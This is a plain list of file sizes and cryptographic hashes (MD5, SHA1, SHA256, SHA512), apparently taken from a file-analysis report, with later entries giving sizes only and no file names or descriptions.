SHA512ebd35af3283de055310a5d97690559395aec96729e67a90309764517fb98ff402d3d89d94496b84bb3278b63ac82e5a2aff347691d17ccf4829b846b4a366123
-
Filesize
2.9MB
MD51c888cc213368959199542257eea0230
SHA1a6bf554ab07a967e7dd4f2a5269d627b4fce865c
SHA2566cae0ed7a623627a173f12c16c5428b8df74e76851ea5187ab20d69f696e9462
SHA5125b4374c6ebbd9e492bf8a1316c5e162f1ed129d9d1697a04f6363244f2e95c3b62677e0e469ca3f914264ac7da81ae6e40ecca1d650ba3637b844e15b201426e
-
Filesize
7.7MB
MD5c3bff79b80087d6bd296a0e6e0803322
SHA1dbab978ab6e0407b3025547f0e074a16bd4b5c42
SHA25665ace245750d09ebadffadd7d9e61142b0e30097738ce5d77122a481d1a6d888
SHA51255bc871c78309571b6b1826a0b7d0f35724a5699e66dd1aed732067f26ffaa3b5e50c4b227098cf391dfc67905b56ee1b02fcc2640f9036f1e091b8ca84e3667
-
Filesize
43.7MB
MD5a931e8ebf02e9fa83034f086582842d7
SHA132369963661e31371c54777d20cfb0c92fac84a1
SHA2560f133f901df0fd69cd3bf52044bf11ea4650be88a8523724c4482037797da188
SHA512f34cf464b8fbb40d95321e37d76444ec878a87466aee810cbdcb181033a673ada1308b451bbb7530f4573214b48367a18029f3d133ce5156e53f5b1b66b7f51c
-
Filesize
806KB
MD5b91e1dfd13f5e8a3d545132279fd732e
SHA11b3204688758e2d037e3920e84e340a3a92289f9
SHA256398b2f923b8c07fcb0eba5c470f00e58f8c7c6d40f9ac87da0c7ee280d2d9a80
SHA51252e517fb9e24ff6d2039717689b0cb190c5b62f44ab6b7eb7aa8736a56968e8b8bf35c40d7d547d2c05b0ca8edb24e82536bb508ef81c10e1ca8dc19a38bc77e
-
Filesize
8.7MB
MD51d6d3f7524fcd9e5a9a8faa1950dfe4e
SHA1de9505d2b71b2465ebdb5682794cb1dca277e433
SHA2567a1a696c131954d7821a9a4607712fc8fee85fc2585d06add24b5cbd54f42ee3
SHA512dc81853b589191e1e706545851ae03e7722fbd57d139b3df6f1e7fd3f966044fe5452430741d1b4af04067f869551bf24b4bfe4f3cb0e881afcd6ac6891b84c2
-
Filesize
3.1MB
MD55f76dfa2eeeb9c78b5aaa0c1e00aab4e
SHA1dec97b746a29f391a699e485239540d6571c2b20
SHA256f0d043c561ff1179ab8a9b316b44cffda4f91d0344afc22a40a8d1356b6290f8
SHA51274d90d79cf44fc47e75953937450b6c2d4d55ea9aa595db14b698c12c33dc054070476f070d648b6c6a2d87286342b2f0ad1202f25dfe7f88e1fa8245811d20e
-
Filesize
1.2MB
MD5cc45aac1e55c2ed2cf6a23e0929b407e
SHA11662fbdb5b7de1bf94772fe65444ae977a166323
SHA256dbf5c32b096a7ae9ff28d137da6213e8e75ca13607b2663b397d97e3bb48b7fd
SHA51282cd7eabd15a8a96aff18e56c53a7b53362f3267af8cc5f7875fb94b663880bc9d18850d214f37562b042baa421770906f45eaae31e24bba621ff29a3b28c128
-
Filesize
20.6MB
MD51654710cf6b911177cd09cec14bf8975
SHA1d2cfe56656ec8f827abae00c4db87a0d4ed25439
SHA256d3fc6b8acd92060014dfc89d298a9e09e41507c0ff21a2568f88ad7f6da11be8
SHA5127d4e0f83aaa76140ccfc9fc1bffd622ce876cb9f0b7091c1c7801da3d9be770c20c6988be8dee894e7d2be723d559e6d477bbb1073ce677dce6f4c6b7054ce50
-
Filesize
33.7MB
MD5d928976317ec94d3c0ddc4f3ae1ca143
SHA10650547879c8cd477a16ff098c1ca92d8209d5ee
SHA256323ffe6acbe19940140032366fa65740eb79f366e03a721395abeb4711f9a785
SHA5127492f881f68e616edf1170b0d40a9460d0aa1609f87b9938ea158148a55780b174d7a26eb74d9c22f2e34f4b0d5bfc686c454beeec5df970262284407c72a099
-
Filesize
1019KB
MD515bd2a7a1b7bac4f53832650aafe5d0a
SHA1dd5112fbfc804953602e8045b3a1abb671bffaee
SHA2564eee67719e5213424f25a7b02e2a18bbf1c3c2fa1e78b3529b9a572927e3fec5
SHA512430aeb022ec0c1332559873e1ef78aef9ccbcaf6e6b91663a5fda38788a86c49d94ebb30585544329a660a0fdb02dfcaefb6e49087446ef135648b5a7d960343
-
Filesize
4.4MB
MD500f804d576e06611aab3d16cc4377250
SHA1f6f74367217574a1eb7b0e658da96bf97ef23a1b
SHA25680c2029ce8eec6354ead33be1d31522d421bdae8593f77aa127347f536f45d3d
SHA51244e0141b95024fe9a28e3c35a770e8593eb327eac6a2f28b437643cbe428dfd83f151d87aba4d366b2128165c1c38edbb672d986c8129949cc989c6b9c70e6f8
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
9.0MB
MD5388c438cb5a9673616b2dbddc6aeda72
SHA144b6469f0e4054b92f11e3045cfb4574a523179e
SHA2569d208cb90a51d480f6fa4bfc49fba80c07b44bfd411f508b5f9b9dcc7f395bed
SHA5123193f257e70a34e8c77a3d1e3554e8eb0e9e91bc93e20c9df0660e8c0d867dbf305e0f9340ac4f84acb0eb4a98acbed758108b56d07e50982b92a9b198ccb2e7
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
6.6MB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
72KB
-
Filesize
6.6MB
-
Filesize
6.6MB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
32KB
-
Filesize
72KB
-
Filesize
364KB
-
Filesize
952KB
-
Filesize
952KB
-
Filesize
364KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
64KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
364KB
-
Filesize
304KB
-
Filesize
364KB
-
Filesize
364KB